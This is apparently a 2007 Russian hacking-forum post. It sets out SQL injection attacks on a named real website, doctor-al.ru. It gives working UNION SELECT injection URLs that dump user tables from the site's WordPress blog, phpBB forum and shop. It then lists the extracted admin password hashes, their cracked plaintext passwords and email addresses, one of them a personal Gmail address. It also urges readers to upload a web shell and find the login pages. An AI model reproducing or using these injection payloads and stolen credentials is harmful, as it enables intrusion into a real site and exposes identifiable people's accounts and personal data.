28.03.2007, 11:57
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
doctor-al.ru
#блог - wordpress(ru)
Код:
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass,user_email),5,6,7+from+wp_users/*&type=news
admin: bcbe4299f228fe2c719266277c7d360f:site_admin@doctor-al.ru == b08323
идем дальше..
#форум - phpbb
Код:
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_password,user_email),5,6,7+from+phpbb_users+limit+1,1/*&type=news
admin: 8542516f8870173d7d1daba1daaaf0a1:admin@doctor-al.ru == 12321
мда, админы не меняются 
можете попробовать залить шелл.
и напоследок
#shop
Код:
http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,login,password,email),5,6,7+from+shop_users+limit+0,1/*&type=news
расшифровал пару хешей ради интереса.. ничего примечательного в шопе не нашел.
nytro: 827ccb0eea8a706c4c34a16891f84e7b:ruslan.shchipun@gmail.com == 12345
думаю, пути к формам авторизации найдете сами
|
|
|